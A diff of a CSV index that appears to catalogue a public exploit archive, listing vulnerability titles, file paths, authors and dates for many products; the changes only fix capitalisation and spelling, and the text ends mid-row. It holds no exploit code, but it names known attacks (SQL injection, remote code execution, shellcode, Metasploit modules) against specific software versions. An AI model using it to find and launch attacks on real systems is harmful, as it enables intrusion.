-33797,platforms/php/webapps/33797.txt,"Joomla! 'com_jresearch' Component - 'controller' Parameter Local File Inclusion",2010-03-24,"Chip d3 bi0s",php,webapps,0 +33797,platforms/php/webapps/33797.txt,"Joomla! 'com_jresearch' Component - 'Controller' Parameter Local File Inclusion",2010-03-24,"Chip d3 bi0s",php,webapps,0 33798,platforms/linux/remote/33798.html,"Mozilla Firefox 3.6 - Image Preloading Content-Policy Check Security Bypass",2010-03-18,"Josh Soref",linux,remote,0 33799,platforms/solaris/local/33799.sh,"Sun Connection Update Manager for Solaris - Multiple Insecure Temporary File Creation Vulnerabilities",2010-03-24,"Larry W. Cashdollar",solaris,local,0 33800,platforms/multiple/dos/33800.html,"Mozilla Firefox 3.6 - 'gfxTextRun::SanitizeGlyphRuns()' Remote Memory Corruption",2010-03-24,"Jesse Ruderman",multiple,dos,0 -33801,platforms/linux/dos/33801.txt,"Mozilla Firefox/Thunderbird/Seamonkey - Multiple Memory Corruption Vulnerabilities",2010-03-24,"Bob Clary",linux,dos,0 +33801,platforms/linux/dos/33801.txt,"Mozilla Firefox/Thunderbird/SeaMonkey - Multiple Memory Corruption Vulnerabilities",2010-03-24,"Bob Clary",linux,dos,0 33802,platforms/multiple/remote/33802.txt,"Jenkins Software RakNet 3.72 - Remote Integer Underflow",2010-03-25,"Luigi Auriemma",multiple,remote,0 33803,platforms/hardware/webapps/33803.txt,"ZTE WXV10 W300 - Multiple Vulnerabilities",2014-06-18,"Osanda Malith",hardware,webapps,0 33804,platforms/windows/dos/33804.pl,"Ubisoft Rayman Legends 1.2.103716 - Remote Stack Buffer Overflow",2014-06-18,LiquidWorm,windows,dos,0 -33805,platforms/linux/remote/33805.pl,"AlienVault OSSIM < 4.7.0 - av-centerd 'get_log_line()' Remote Code Execution",2014-06-18,"Alfredo Ramirez",linux,remote,0 +33805,platforms/linux/remote/33805.pl,"Alienvault OSSIM < 4.7.0 - av-centerd 'get_log_line()' Remote Code Execution",2014-06-18,"Alfredo Ramirez",linux,remote,0 34141,platforms/php/webapps/34141.txt,"AneCMS 1.x - 'modules/blog/index.php' SQL Injection",2010-06-11,"High-Tech Bridge SA",php,webapps,0 33976,platforms/php/webapps/33976.html,"Saurus CMS 4.7 - 'edit.php' Cross-Site Scripting",2010-05-11,"High-Tech Bridge SA",php,webapps,0 33807,platforms/multiple/remote/33807.rb,"Rocket Servergraph Admin Center - fileRequestor Remote Code Execution",2014-06-18,Metasploit,multiple,remote,8888 @@ -30462,7 +30463,7 @@ id,file,description,date,author,platform,type,port 33810,platforms/osx/remote/33810.html,"Apple Safari for iPhone/iPod touch - Malformed 'Throw' Exception Remote Code Execution",2010-03-26,"Nishant Das Patnaik",osx,remote,0 33811,platforms/osx/remote/33811.html,"Apple Safari iPhone/iPod touch - Malformed Webpage Remote Code Execution",2010-03-26,"Nishant Das Patnaik",osx,remote,0 33812,platforms/php/webapps/33812.txt,"Joomla! 'com_weblinks' Component - 'id' Parameter SQL Injection",2010-03-29,"Pouya Daneshmand",php,webapps,0 -33813,platforms/php/webapps/33813.html,"Fuctweb CapCC Plugin 1.0 for Wordpress - 'plugins.php' SQL Injection",2008-12-13,MustLive,php,webapps,0 +33813,platforms/php/webapps/33813.html,"Fuctweb CapCC Plugin 1.0 for WordPress - 'plugins.php' SQL Injection",2008-12-13,MustLive,php,webapps,0 33814,platforms/php/webapps/33814.txt,"Piwik 0.5.5 - 'form_url' Parameter Cross-Site Scripting",2010-03-31,garwga,php,webapps,0 33815,platforms/php/webapps/33815.txt,"OSSIM 2.2.1 - '$_SERVER['PHP_SELF']' Parameter Cross-Site Scripting",2010-03-31,"CONIX Security",php,webapps,0 33816,platforms/multiple/remote/33816.pl,"Miranda IM 0.8.16 - Information Disclosure",2010-04-06,"Jan Schejbal",multiple,remote,0 @@ -30482,7 +30483,7 @@ id,file,description,date,author,platform,type,port 33830,platforms/php/webapps/33830.txt,"Lunar CMS 3.3 - Cross-Site Request Forgery / Persistent Cross-Site Scripting",2014-06-21,LiquidWorm,php,webapps,0 33832,platforms/php/webapps/33832.txt,"TANDBERG Video Communication Server 4.2.1/4.3.0 - Multiple Remote Vulnerabilities",2010-04-12,"Jon Hart",php,webapps,0 33833,platforms/php/webapps/33833.txt,"Blog System 1.x - Multiple Input Validation Vulnerabilities",2010-04-12,"cp77fk4r ",php,webapps,0 -33834,platforms/php/webapps/33834.txt,"Vana CMS - 'filename' Parameter Remote File Download",2010-04-13,"Pouya Daneshmand",php,webapps,0 +33834,platforms/php/webapps/33834.txt,"Vana CMS - 'Filename' Parameter Remote File Download",2010-04-13,"Pouya Daneshmand",php,webapps,0 33835,platforms/php/webapps/33835.txt,"AneCMS 1.0 - Multiple Local File Inclusion",2010-04-12,"AmnPardaz Security Research Team",php,webapps,0 33836,platforms/windows/shellcode/33836.txt,"Windows - Add Admin User _BroK3n_ Shellcode (194 bytes)",2014-06-22,"Giuseppe D'Amore",windows,shellcode,0 33839,platforms/multiple/remote/33839.txt,"Oracle E-Business Suite Financials 12 - 'jtfwcpnt.jsp' SQL Injection",2010-04-15,"Joxean Koret",multiple,remote,0 @@ -30490,19 +30491,19 @@ id,file,description,date,author,platform,type,port 33841,platforms/windows/remote/33841.txt,"HTTP File Server 2.2 - Security Bypass / Denial of Service",2010-04-19,"Luigi Auriemma",windows,remote,0 33880,platforms/windows/remote/33880.rb,"Cogent DataHub - Command Injection",2014-06-25,Metasploit,windows,remote,0 33857,platforms/php/webapps/33857.txt,"e107 0.7.x - 'e107_admin/banner.php' SQL Injection",2010-04-21,"High-Tech Bridge SA",php,webapps,0 -33997,platforms/php/webapps/33997.txt,"NPDS Revolution 10.02 - 'download.php' Cross-Site Scripting",2010-05-18,"High-Tech Bridge SA",php,webapps,0 +33997,platforms/php/webapps/33997.txt,"NPDS REvolution 10.02 - 'download.php' Cross-Site Scripting",2010-05-18,"High-Tech Bridge SA",php,webapps,0 33998,platforms/php/webapps/33998.html,"JoomlaTune JComments 2.1 Joomla! Component - 'ComntrNam' Parameter Cross-Site Scripting",2010-05-18,"High-Tech Bridge SA",php,webapps,0 33847,platforms/multiple/remote/33847.txt,"netkar-PRO 1.1 - Remote Stack Buffer Overflow",2010-04-13,"Luigi Auriemma",multiple,remote,0 33848,platforms/windows/remote/33848.py,"WinMount 3.3.401 - '.zip' Remote Buffer Overflow",2010-04-19,lilf,windows,remote,0 -33846,platforms/php/webapps/33846.txt,"ZeroCMS 1.0 - (zero_transact_article.php article_id POST parameter) SQL Injection",2014-06-23,"Filippos Mastrogiannis",php,webapps,0 +33846,platforms/php/webapps/33846.txt,"ZeroCMS 1.0 - (zero_transact_article.php article_id POST Parameter) SQL Injection",2014-06-23,"Filippos Mastrogiannis",php,webapps,0 33849,platforms/windows/dos/33849.txt,"netKar PRO 1.1 - '.nkuser' File Creation NULL Pointer Denial Of Service",2014-06-13,"A reliable source",windows,dos,0 33850,platforms/linux/dos/33850.txt,"memcached 1.4.2 - Memory Consumption Remote Denial of Service",2010-04-27,fallenpegasus,linux,dos,0 -33851,platforms/php/webapps/33851.txt,"Wordpress TimThumb 2.8.13 WebShot Plugin/Theme - Remote Code Execution",2014-06-24,@u0x,php,webapps,0 +33851,platforms/php/webapps/33851.txt,"WordPress TimThumb 2.8.13 WebShot Plugin/Theme - Remote Code Execution",2014-06-24,@u0x,php,webapps,0 33868,platforms/multiple/remote/33868.txt,"Apache ActiveMQ 5.2/5.3 - Source Code Information Disclosure",2010-04-22,"Veerendra G.G",multiple,remote,0 33860,platforms/windows/dos/33860.html,"Microsoft Internet Explorer 8 / 9 / 10 - CInput Use-After-Free Crash PoC (MS14-035)",2014-06-24,"Drozdova Liudmila",windows,dos,0 33854,platforms/php/webapps/33854.txt,"vBulletin Two-Step External Link Module - 'externalredirect.php' Cross-Site Scripting",2010-04-20,"Edgard Chammas",php,webapps,0 33881,platforms/php/webapps/33881.txt,"PowerEasy 2006 - 'ComeUrl' Parameter Cross-Site Scripting",2010-04-24,Liscker,php,webapps,0 -33855,platforms/linux/remote/33855.txt,"MIT Kerberos 5 - 'src/kdc/do_tgs_req.c' Ticket Renewal Double Free Memory Corruption",2010-04-20,"Joel Johnson",linux,remote,0 +33855,platforms/linux/remote/33855.txt,"MIT Kerberos 5 - 'src/kdc/do_tgs_req.c' Ticket Renewal Double-Free Memory Corruption",2010-04-20,"Joel Johnson",linux,remote,0 33856,platforms/php/webapps/33856.txt,"Viennabux Beta! - 'cat' Parameter SQL Injection",2010-04-09,"Easy Laster",php,webapps,0 33858,platforms/php/webapps/33858.txt,"DBSite wb CMS - 'index.php' Multiple Cross-Site Scripting Vulnerabilities",2010-04-21,The_Exploited,php,webapps,0 34143,platforms/windows/remote/34143.txt,"XnView 1.97.4 - MBM File Remote Heap Buffer Overflow",2010-06-14,"Mauro Olea",windows,remote,0 @@ -30510,19 +30511,19 @@ id,file,description,date,author,platform,type,port 34145,platforms/unix/dos/34145.txt,"Python 3.2 - 'audioop' Module Memory Corruption",2010-06-14,haypo,unix,dos,0 34146,platforms/php/webapps/34146.txt,"Sell@Site PHP Online Jobs Login - Multiple SQL Injections",2010-06-15,"L0rd CrusAd3r",php,webapps,0 34147,platforms/php/webapps/34147.txt,"JForum 2.1.8 - 'username' Parameter Cross-Site Scripting",2010-06-06,"Adam Baldwin",php,webapps,0 -33862,platforms/hardware/remote/33862.rb,"D-Link - authentication.cgi Buffer Overflow",2014-06-24,Metasploit,hardware,remote,80 +33862,platforms/hardware/remote/33862.rb,"D-Link - Authentication.cgi Buffer Overflow",2014-06-24,Metasploit,hardware,remote,80 33863,platforms/hardware/remote/33863.rb,"D-Link - hedwig.cgi Buffer Overflow in Cookie Header",2014-06-24,Metasploit,hardware,remote,80 -33865,platforms/linux/remote/33865.rb,"AlienVault OSSIM - av-centerd Command Injection",2014-06-24,Metasploit,linux,remote,40007 +33865,platforms/linux/remote/33865.rb,"Alienvault OSSIM - av-centerd Command Injection",2014-06-24,Metasploit,linux,remote,40007 33866,platforms/hardware/webapps/33866.html,"Thomson TWG87OUIR - POST Password Cross-Site Request Forgery",2014-06-25,nopesled,hardware,webapps,0 33867,platforms/php/webapps/33867.txt,"Lunar CMS 3.3 - Unauthenticated Remote Command Execution Exploit",2014-06-25,LiquidWorm,php,webapps,0 34142,platforms/php/webapps/34142.txt,"MODx 1.0.3 - 'index.php' Multiple SQL Injection",2010-06-14,"High-Tech Bridge SA",php,webapps,0 33869,platforms/hardware/remote/33869.txt,"Huawei EchoLife HG520 3.10.18.5-1.0.5.0 - Remote Information Disclosure",2010-04-22,hkm,hardware,remote,0 33870,platforms/php/webapps/33870.txt,"FlashCard 2.6.5 - 'id' Parameter Cross-Site Scripting",2010-04-22,Valentin,php,webapps,0 33871,platforms/multiple/remote/33871.txt,"Tiny Java Web Server 1.71 - Multiple Input Validation Vulnerabilities",2010-04-08,"cp77fk4r ",multiple,remote,0 -33873,platforms/multiple/remote/33873.txt,"HP System Management Homepage - 'RedirectUrl' Parameter URI Redirection",2010-04-25,"Aung Khant",multiple,remote,0 +33873,platforms/multiple/remote/33873.txt,"HP System Management Homepage - 'RedirectUrl' Parameter URI redirection",2010-04-25,"Aung Khant",multiple,remote,0 33874,platforms/php/webapps/33874.txt,"Ektron CMS400.NET 7.5.2 - Multiple Security Vulnerabilities",2010-04-26,"Richard Moore",php,webapps,0 33875,platforms/php/webapps/33875.txt,"HuronCMS - 'index.php' Multiple SQL Injection",2010-03-30,mat,php,webapps,0 -33876,platforms/multiple/dos/33876.c,"NovaSTOR NovaNET 11.0 - Remote Denial of Service / arbitrary memory read",2007-09-14,mu-b,multiple,dos,0 +33876,platforms/multiple/dos/33876.c,"NovaSTOR NovaNET 11.0 - Remote Denial of Service / Arbitrary memory read",2007-09-14,mu-b,multiple,dos,0 33877,platforms/multiple/remote/33877.c,"NovaSTOR NovaNET 12.0 - Remote Root Exploit",2007-09-25,mu-b,multiple,remote,0 33878,platforms/multiple/remote/33878.c,"NovaSTOR NovaNET 12.0 - Remote SYSTEM Exploit",2007-09-25,mu-b,multiple,remote,0 33879,platforms/multiple/dos/33879.c,"NovaSTOR NovaNET/NovaBACKUP 13.0 - Remote Denial of Service",2007-10-02,mu-b,multiple,dos,0 @@ -30538,11 +30539,11 @@ id,file,description,date,author,platform,type,port 33891,platforms/java/remote/33891.rb,"HP AutoPass License Server - Arbitrary File Upload",2014-06-27,Metasploit,java,remote,5814 33892,platforms/windows/local/33892.rb,".NET Deployment Service - IE Sandbox Escape (MS14-009)",2014-06-27,Metasploit,windows,local,0 33893,platforms/windows/local/33893.rb,"Registry Symlink - IE Sandbox Escape (MS13-097)",2014-06-27,Metasploit,windows,local,0 -33894,platforms/multiple/webapps/33894.txt,"Python CGIHTTPServer - Encoded Path Traversal",2014-06-27,"RedTeam Pentesting",multiple,webapps,0 -40096,platforms/multiple/dos/40096.txt,"Adobe Acrobat Reader DC 15.016.20045 - Invalid Font (.ttf ) Memory Corruption (2)",2016-07-13,COSIG,multiple,dos,0 -40097,platforms/multiple/dos/40097.txt,"Adobe Acrobat Reader DC 15.016.20045 - Invalid Font (.ttf ) Memory Corruption (3)",2016-07-13,COSIG,multiple,dos,0 -40098,platforms/multiple/dos/40098.txt,"Adobe Acrobat Reader DC 15.016.20045 - Invalid Font (.ttf ) Memory Corruption (4)",2016-07-13,COSIG,multiple,dos,0 -33896,platforms/php/webapps/33896.txt,"Wordpress Simple Share Buttons Adder Plugin 4.4 - Multiple Vulnerabilities",2014-06-27,dxw,php,webapps,80 +33894,platforms/multiple/webapps/33894.txt,"Python CGIHTTPServer - Encoded Directory Traversal",2014-06-27,"RedTeam Pentesting",multiple,webapps,0 +40096,platforms/multiple/dos/40096.txt,"Adobe Acrobat Reader DC 15.016.20045 - Invalid Font '.ttf' Memory Corruption (2)",2016-07-13,COSIG,multiple,dos,0 +40097,platforms/multiple/dos/40097.txt,"Adobe Acrobat Reader DC 15.016.20045 - Invalid Font '.ttf' Memory Corruption (3)",2016-07-13,COSIG,multiple,dos,0 +40098,platforms/multiple/dos/40098.txt,"Adobe Acrobat Reader DC 15.016.20045 - Invalid Font '.ttf' Memory Corruption (4)",2016-07-13,COSIG,multiple,dos,0 +33896,platforms/php/webapps/33896.txt,"WordPress Simple Share Buttons Adder Plugin 4.4 - Multiple Vulnerabilities",2014-06-27,dxw,php,webapps,80 33897,platforms/multiple/webapps/33897.txt,"Endeca Latitude 2.2.2 - Cross-Site Request Forgery",2014-06-27,"RedTeam Pentesting",multiple,webapps,0 33899,platforms/linux/local/33899.txt,"Chkrootkit 0.49 - Privilege Escalation",2014-06-28,"Thomas Stangner",linux,local,0 33900,platforms/windows/remote/33900.pl,"Serenity Audio Player 3.2.3 - '.m3u' Buffer Overflow",2010-04-26,Madjix,windows,remote,0 @@ -30561,7 +30562,7 @@ id,file,description,date,author,platform,type,port 33964,platforms/windows/remote/33964.txt,"X-Motor Racing 1.26 - Buffer Overflow / Multiple Denial of Service Vulnerabilities",2010-05-06,"Luigi Auriemma",windows,remote,0 33965,platforms/linux/dos/33965.txt,"Geo++ GNCASTER 1.4.0.7 - HTTP GET Request Denial Of Service",2010-01-27,"RedTeam Pentesting GmbH",linux,dos,0 33966,platforms/linux/dos/33966.rb,"Geo++ GNCASTER 1.4.0.7 NMEA-data - Denial Of Service",2010-01-27,"RedTeam Pentesting GmbH",linux,dos,0 -33967,platforms/php/webapps/33967.txt,"Chipmunk Newsletter 2.0 - Multiple Cross-Site Scripting Vulnerabilities",2010-01-20,b0telh0,php,webapps,0 +33967,platforms/php/webapps/33967.txt,"Chipmunk NewsLetter 2.0 - Multiple Cross-Site Scripting Vulnerabilities",2010-01-20,b0telh0,php,webapps,0 33968,platforms/windows/dos/33968.pl,"Xitami 5.0 - '/AUX' Request Remote Denial Of Service",2010-05-10,"Usman Saeed",windows,dos,0 33969,platforms/php/webapps/33969.txt,"eFront 3.x - 'ask_chat.php' SQL Injection",2010-05-09,"Stefan Esser",php,webapps,0 33970,platforms/php/webapps/33970.txt,"EasyPublish CMS 23.04.2010 - URI Cross-Site Scripting",2010-05-10,"High-Tech Bridge SA",php,webapps,0 @@ -30598,7 +30599,7 @@ id,file,description,date,author,platform,type,port 33940,platforms/multiple/remote/33940.txt,"VMware View 3.1.x - URL Processing Cross-Site Scripting",2010-05-05,"Alexey Sintsov",multiple,remote,0 33941,platforms/windows/remote/33941.html,"TVUPlayer 2.4.4.9beta1 - 'PlayerOcx.ocx' ActiveX Control Arbitrary File Overwrite",2010-02-03,"Evdokimov Dmitriy",windows,remote,0 33942,platforms/jsp/webapps/33942.txt,"IBM Algorithmics RICOS 4.5.0 < 4.7.0 - Multiple Vulnerabilities",2014-07-01,"SEC Consult",jsp,webapps,80 -33943,platforms/aix/dos/33943.txt,"Flussonic Media Server 4.1.25 < 4.3.3 - Aribtrary File Disclosure",2014-07-01,"BGA Security",aix,dos,8080 +33943,platforms/aix/dos/33943.txt,"Flussonic Media Server 4.1.25 < 4.3.3 - Arbitrary File Disclosure",2014-07-01,"BGA Security",aix,dos,8080 33944,platforms/windows/remote/33944.html,"Microsoft Internet Explorer 8 - Fixed Col Span ID (Full ASLR + DEP + EMET 4.1.x Bypass) (MS12-037)",2014-07-01,sickness,windows,remote,0 33945,platforms/php/webapps/33945.txt,"DeluxeBB 1.x - 'newpost.php' SQL Injection",2010-05-06,"Stefan Esser",php,webapps,0 33946,platforms/php/webapps/33946.txt,"EmiratesHost - Insecure Cookie Authentication Bypass",2010-02-01,jago-dz,php,webapps,0 @@ -30614,17 +30615,17 @@ id,file,description,date,author,platform,type,port 33975,platforms/php/webapps/33975.html,"Affiliate Store Builder - 'edit_cms.php' Multiple SQL Injection",2010-05-11,"High-Tech Bridge SA",php,webapps,0 33977,platforms/windows/dos/33977.txt,"Torque Game Engine - Multiple Denial Of Service Vulnerabilities",2010-05-09,"Luigi Auriemma",windows,dos,0 33978,platforms/php/webapps/33978.txt,"TomatoCMS 2.0.x - SQL Injection",2010-05-12,"Russ McRee",php,webapps,0 -33979,platforms/php/webapps/33979.txt,"C99Shell 1.0 pre-release build 16 - 'Ch99.php' Cross-Site Scripting",2010-05-19,indoushka,php,webapps,0 +33979,platforms/php/webapps/33979.txt,"C99Shell 1.0 Pre-Release build 16 - 'Ch99.php' Cross-Site Scripting",2010-05-19,indoushka,php,webapps,0 33980,platforms/windows/remote/33980.txt,"Best Way GEM Engine - Multiple Vulnerabilities",2009-10-12,"Luigi Auriemma",windows,remote,0 33981,platforms/windows/remote/33981.txt,"GameCore 2.5 - 'GameID' Integer Overflow",2010-05-13,"Luigi Auriemma",windows,remote,0 -33982,platforms/php/webapps/33982.txt,"NPDS Revolution 10.02 - 'download.php' SQL Injection",2010-05-13,"High-Tech Bridge SA",php,webapps,0 +33982,platforms/php/webapps/33982.txt,"NPDS REvolution 10.02 - 'download.php' SQL Injection",2010-05-13,"High-Tech Bridge SA",php,webapps,0 33983,platforms/php/webapps/33983.txt,"Frog CMS 0.9.5 - Arbitrary File Upload",2014-07-06,"Javid Hussain",php,webapps,0 -33985,platforms/php/webapps/33985.txt,"NPDS Revolution 10.02 - 'topic' Parameter Cross-Site Scripting",2010-05-13,"High-Tech Bridge SA",php,webapps,0 +33985,platforms/php/webapps/33985.txt,"NPDS REvolution 10.02 - 'topic' Parameter Cross-Site Scripting",2010-05-13,"High-Tech Bridge SA",php,webapps,0 33986,platforms/php/webapps/33986.txt,"PHP File Uploader - Remote File Upload",2010-01-03,indoushka,php,webapps,0 33987,platforms/php/webapps/33987.txt,"PHP Banner Exchange 1.2 - 'signupconfirm.php' Cross-Site Scripting",2010-01-03,indoushka,php,webapps,0 34112,platforms/windows/local/34112.txt,"Microsoft Windows XP SP3 - MQAC.sys Arbitrary Write Privilege Escalation",2014-07-19,KoreLogic,windows,local,0 33990,platforms/multiple/remote/33990.rb,"Gitlist - Unauthenticated Remote Command Execution",2014-07-07,Metasploit,multiple,remote,80 -33991,platforms/php/remote/33991.rb,"Wordpress MailPoet Newsletters 2.6.8 Plugin - (wysija-newsletters) Unauthenticated File Upload",2014-07-07,Metasploit,php,remote,80 +33991,platforms/php/remote/33991.rb,"WordPress MailPoet Newsletters 2.6.8 Plugin - (wysija-newsletters) Unauthenticated File Upload",2014-07-07,Metasploit,php,remote,80 33992,platforms/asp/webapps/33992.txt,"Platnik 8.1.1 - Multiple SQL Injections",2010-05-17,podatnik386,asp,webapps,0 33993,platforms/php/webapps/33993.txt,"Planet Script 1.x - 'idomains.php' Cross-Site Scripting",2010-05-14,Mr.ThieF,php,webapps,0 33994,platforms/php/webapps/33994.txt,"PonVFTP - Insecure Cookie Authentication Bypass",2010-05-17,SkuLL-HackeR,php,webapps,0 @@ -30634,12 +30635,12 @@ id,file,description,date,author,platform,type,port 34000,platforms/multiple/webapps/34000.txt,"Serialsystem 1.0.4 Beta - 'list' Parameter Cross-Site Scripting",2010-01-18,indoushka,multiple,webapps,0 34001,platforms/linux/local/34001.c,"Linux Kernel 2.6.x - Btrfs Cloned File Security Bypass",2010-05-18,"Dan Rosenberg",linux,local,0 34002,platforms/windows/remote/34002.c,"TeamViewer 5.0.8232 - Remote Buffer Overflow",2010-05-18,"fl0 fl0w",windows,remote,0 -34003,platforms/php/webapps/34003.txt,"Percha Image Attach 1.1 Component for Joomla! - 'index.php' controller Parameter Traversal Arbitrary File Access",2010-05-19,AntiSecurity,php,webapps,0 -34004,platforms/php/webapps/34004.txt,"Percha Fields Attach 1.0 Component for Joomla! - 'index.php' controller Parameter Traversal Arbitrary File Access",2010-05-19,AntiSecurity,php,webapps,0 -34005,platforms/php/webapps/34005.txt,"Percha Downloads Attach 1.1 Component for Joomla! - 'index.php' controller Parameter Traversal Arbitrary File Access",2010-05-19,AntiSecurity,php,webapps,0 -34006,platforms/php/webapps/34006.txt,"Percha Gallery Component 1.6 Beta for Joomla! - 'index.php' controller Parameter Traversal Arbitrary File Access",2010-05-19,AntiSecurity,php,webapps,0 +34003,platforms/php/webapps/34003.txt,"Percha Image Attach 1.1 Component for Joomla! - 'index.php' Controller Parameter Traversal Arbitrary File Access",2010-05-19,AntiSecurity,php,webapps,0 +34004,platforms/php/webapps/34004.txt,"Percha Fields Attach 1.0 Component for Joomla! - 'index.php' Controller Parameter Traversal Arbitrary File Access",2010-05-19,AntiSecurity,php,webapps,0 +34005,platforms/php/webapps/34005.txt,"Percha Downloads Attach 1.1 Component for Joomla! - 'index.php' Controller Parameter Traversal Arbitrary File Access",2010-05-19,AntiSecurity,php,webapps,0 +34006,platforms/php/webapps/34006.txt,"Percha Gallery Component 1.6 Beta for Joomla! - 'index.php' Controller Parameter Traversal Arbitrary File Access",2010-05-19,AntiSecurity,php,webapps,0 34007,platforms/php/webapps/34007.txt,"Dolibarr CMS 3.5.3 - Multiple Security Vulnerabilities",2014-07-08,"Deepak Rathore",php,webapps,0 -34008,platforms/php/webapps/34008.txt,"Percha Multicategory Article Component 0.6 for Joomla! - 'index.php' controller Parameter Arbitrary File Access",2010-05-19,AntiSecurity,php,webapps,0 +34008,platforms/php/webapps/34008.txt,"Percha Multicategory Article Component 0.6 for Joomla! - 'index.php' Controller Parameter Arbitrary File Access",2010-05-19,AntiSecurity,php,webapps,0 34009,platforms/windows/remote/34009.rb,"Yokogawa CS3000 - BKFSim_vhfd.exe Buffer Overflow",2014-07-08,Metasploit,windows,remote,20010 34010,platforms/win_x86/dos/34010.html,"Microsoft Internet Explorer 9/10 - CFormElement Use-After-Free and Memory Corruption PoC (MS14-035)",2014-07-08,"Drozdova Liudmila",win_x86,dos,0 34011,platforms/php/webapps/34011.txt,"Shopzilla Affiliate Script PHP - 'search.php' Cross-Site Scripting",2010-05-19,"Andrea Bocchetti",php,webapps,0 @@ -30661,7 +30662,7 @@ id,file,description,date,author,platform,type,port 34028,platforms/solaris/dos/34028.txt,"Sun Solaris 10 - 'in.ftpd' Long Command Handling Security",2010-05-21,"Maksymilian Arciemowicz",solaris,dos,0 34029,platforms/php/webapps/34029.txt,"Specialized Data Systems Parent Connect 2010.04.11 - Multiple SQL Injections",2010-05-21,epixoip,php,webapps,0 34031,platforms/php/webapps/34031.txt,"gpEasy CMS 1.6.2 - 'editing_files.php' Cross-Site Scripting",2010-05-18,"High-Tech Bridge SA",php,webapps,0 -34032,platforms/php/webapps/34032.txt,"NPDS Revolution 10.02 - 'admin.php' Cross-Site Request Forgery",2010-05-20,"High-Tech Bridge SA",php,webapps,0 +34032,platforms/php/webapps/34032.txt,"NPDS REvolution 10.02 - 'admin.php' Cross-Site Request Forgery",2010-05-20,"High-Tech Bridge SA",php,webapps,0 34033,platforms/hardware/remote/34033.html,"Cisco DPC2100 2.0.2 r1256-060303 - Multiple Security Bypass / Cross-Site Request Forgery Vulnerabilities",2010-05-24,"Dan Rosenberg",hardware,remote,0 34034,platforms/asp/webapps/34034.txt,"cyberhost - 'default.asp' SQL Injection",2010-05-22,redst0rm,asp,webapps,0 34035,platforms/php/webapps/34035.sjs,"OpenForum 2.2 b005 - 'saveAsAttachment()' Method Arbitrary File Creation",2010-05-23,"John Leitch",php,webapps,0 @@ -30670,13 +30671,13 @@ id,file,description,date,author,platform,type,port 34038,platforms/php/webapps/34038.txt,"Aerohive HiveOS 5.1r5 < 6.1r5 - Multiple Vulnerabilities",2014-07-12,DearBytes,php,webapps,0 34189,platforms/php/webapps/34189.txt,"Sphider 1.3.6 - Multiple Vulnerabilities",2014-07-28,"Mike Manzotti",php,webapps,80 34040,platforms/php/webapps/34040.txt,"razorCMS 1.0 - 'admin/index.php' HTML Injection",2010-05-24,"High-Tech Bridge SA",php,webapps,0 -34041,platforms/php/webapps/34041.txt,"GetSimple CMS 2.01 - 'components.php' Cross-Site Scripting",2010-05-24,"High-Tech Bridge SA",php,webapps,0 -34042,platforms/php/webapps/34042.txt,"RuubikCMS 1.0.3 - 'index.php' Cross-Site Scripting",2010-05-24,"High-Tech Bridge SA",php,webapps,0 +34041,platforms/php/webapps/34041.txt,"Getsimple CMS 2.01 - 'components.php' Cross-Site Scripting",2010-05-24,"High-Tech Bridge SA",php,webapps,0 +34042,platforms/php/webapps/34042.txt,"Ruubikcms 1.0.3 - 'index.php' Cross-Site Scripting",2010-05-24,"High-Tech Bridge SA",php,webapps,0 34043,platforms/php/webapps/34043.txt,"360 Web Manager 3.0 - 'webpages-form-led-edit.php' SQL Injection",2010-05-24,"High-Tech Bridge SA",php,webapps,0 34044,platforms/php/webapps/34044.txt,"md5 Encryption Decryption PHP Script - 'index.php' Cross-Site Scripting",2010-05-26,indoushka,php,webapps,0 34045,platforms/php/webapps/34045.txt,"BackLinkSpider 1.3.1774 - 'cat_id' Parameter SQL Injection",2010-05-27,"sniper ip",php,webapps,0 34046,platforms/php/webapps/34046.txt,"BackLinkSpider 1.3.1774 - Multiple Cross-Site Scripting Vulnerabilities",2010-05-27,"sniper ip",php,webapps,0 -34047,platforms/windows/remote/34047.html,"Home FTP Server 1.10.3 - (build 144) Cross-Site Request Forgery",2010-05-26,"John Leitch",windows,remote,0 +34047,platforms/windows/remote/34047.html,"Home FTP Server 1.10.3 (build 144) - Cross-Site Request Forgery",2010-05-26,"John Leitch",windows,remote,0 34048,platforms/multiple/remote/34048.html,"Brekeke PBX 2.4.4.8 - 'pbx/gate' Cross-Site Request Forgery",2010-05-26,"John Leitch",multiple,remote,0 34049,platforms/php/webapps/34049.txt,"Layout CMS 1.0 - SQL Injection / Cross-Site Scripting",2010-01-12,Red-D3v1L,php,webapps,0 34050,platforms/windows/remote/34050.py,"Home FTP Server 1.10.2.143 - Directory Traversal",2010-05-27,"John Leitch",windows,remote,0 @@ -30694,7 +30695,7 @@ id,file,description,date,author,platform,type,port 34064,platforms/hardware/remote/34064.rb,"D-Link HNAP - Request Remote Buffer Overflow",2014-07-14,Metasploit,hardware,remote,80 34065,platforms/hardware/remote/34065.rb,"D-Link - Unauthenticated UPnP M-SEARCH Multicast Command Injection",2014-07-14,Metasploit,hardware,remote,1900 34066,platforms/windows/remote/34066.py,"HP Data Protector Manager 8.10 - Remote Command Execution",2014-07-14,Polunchis,windows,remote,0 -34067,platforms/php/webapps/34067.txt,"Smart Statistics 1.0 - 'smart_statistics_admin.php' Cross-Site Scripting",2010-01-10,R3d-D3V!L,php,webapps,0 +34067,platforms/php/webapps/34067.txt,"Smart Statistics 1.0 - 'smart_Statistics_admin.php' Cross-Site Scripting",2010-01-10,R3d-D3V!L,php,webapps,0 34068,platforms/php/webapps/34068.html,"CMS Made Simple 1.x - Cross-Site Scripting / Cross-Site Request Forgery",2010-01-01,"Truong Thao Nguyen",php,webapps,0 34069,platforms/windows/dos/34069.html,"Microsoft Internet Explorer 8 - CSS 'expression' Remote Denial of Service",2010-01-01,MustLive,windows,dos,0 34070,platforms/php/webapps/34070.txt,"Datetopia Match Agency BiZ - Multiple Cross-Site Scripting Vulnerabilities",2010-01-07,R3d-D3V!L,php,webapps,0 @@ -30702,8 +30703,8 @@ id,file,description,date,author,platform,type,port 34072,platforms/php/webapps/34072.txt,"Hexjector 1.0.7.2 - 'hexjector.php' Cross-Site Scripting",2010-06-01,hexon,php,webapps,0 34073,platforms/php/webapps/34073.py,"TCExam 10.1.7 - 'admin/code/tce_functions_tcecode_editor.php' Arbitrary File Upload",2010-06-02,"John Leitch",php,webapps,0 34136,platforms/multiple/remote/34136.txt,"Plesk Server Administrator (PSA) - 'locale' Parameter Local File Inclusion",2010-06-21,"Pouya Daneshmand",multiple,remote,0 -34114,platforms/php/webapps/34114.txt,"Joomla! JReservation Component - Cross-Site Scripting",2010-06-09,Sid3^effects,php,webapps,0 -34086,platforms/linux/webapps/34086.txt,"Bitdefender GravityZone 5.1.5.386 - Multiple 